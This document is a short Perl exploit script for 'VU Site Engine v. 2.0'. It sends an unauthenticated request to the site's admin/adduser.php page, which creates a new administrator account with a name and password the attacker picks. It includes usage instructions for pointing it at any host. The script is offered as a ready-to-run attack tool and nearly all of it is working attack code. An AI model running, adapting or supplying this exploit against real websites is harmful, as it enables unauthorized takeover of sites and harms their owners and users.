vuSQL.pl.txt

`#!/usr/bin/perl  
  
use IO::Socket;  
  
# VU Site Engine v. 2.0 add new admin exploit  
# Bug found GeW (http://www.security.nitro.ru)  
# Exploit coded by Censored - SV  
#--------------------------------------------  
# Search Vulnerabilities // www.svt.nukleon.us  
  
if (@ARGV < 3) { &usage; }  
  
$host=$ARGV[0];  
$new_admin = $ARGV[1];  
$pass = $ARGV[2];  
  
$host =~ s/(http:\/\/)//eg;  
  
print "[~] Connect to $host\n";  
  
$bug="/admin/adduser.php?logged_user=3&usern=$new_admin&pass=$pass&type=2&used=1";  
$socket=IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "Can't connect to $host\n";  
print "[+] Connect, one moment\n";  
print $socket "POST $bug HTTP/1.1\n";   
print $socket "Host: $host\n";  
print $socket "Accept: */*\n";  
  
print "[~] On $host add new admin\n";  
print "[+] nick: $new_admin\n";  
print "[+] pass: $pass\n";  
  
  
sub usage ()  
{ print q(~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
VU Site Engine v. 2.0 add new admin exploit  
----------------------------------------------  
E.G.   
sv-VUSite.pl www.bla.com Hats hats  
Usage:  
perl sv-VUSite.pl [host] [admin nick] [pass]  
  
Params:  
[host] - vulnerabilities Host  
[admin nick] - new admin nick  
[pass] - pass for new admin  
----------------------------------------------  
Coded by Censored  
Search vulnerabilities // www.svt.nukleon.us  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
);  
exit();  
}  
`